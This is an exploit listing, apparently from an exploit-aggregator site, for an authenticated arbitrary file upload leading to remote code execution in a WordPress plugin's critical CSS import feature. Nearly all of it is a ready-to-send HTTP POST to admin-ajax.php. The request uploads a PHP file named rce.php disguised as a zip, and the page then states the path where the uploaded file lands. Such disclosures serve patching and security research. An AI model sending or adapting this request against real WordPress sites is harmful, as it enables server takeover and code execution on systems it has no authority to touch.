Share
## https://sploitus.com/exploit?id=WPEX-ID:10372
https://drive.google.com/file/d/1siZsDiJsYRCw58Ksram5zBJOVbs-Hio1/view?usp=sharing

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://example.com/wp-admin/options-general.php?page=ao_critcss
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------161325441624547204062709166080
Content-Length: 504
Connection: close
Cookie: [Admin Cookies]

-----------------------------161325441624547204062709166080
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/zip

<?php phpinfo() ?>
-----------------------------161325441624547204062709166080
Content-Disposition: form-data; name="action"

ao_ccss_import
-----------------------------161325441624547204062709166080
Content-Disposition: form-data; name="ao_ccss_import_nonce"

6df2d6b321
-----------------------------161325441624547204062709166080--


Even if the request generates an error 500 (for example when PHP ZipArchive is not installed), file will be at /wp-content/uploads/ao_ccss/rce.php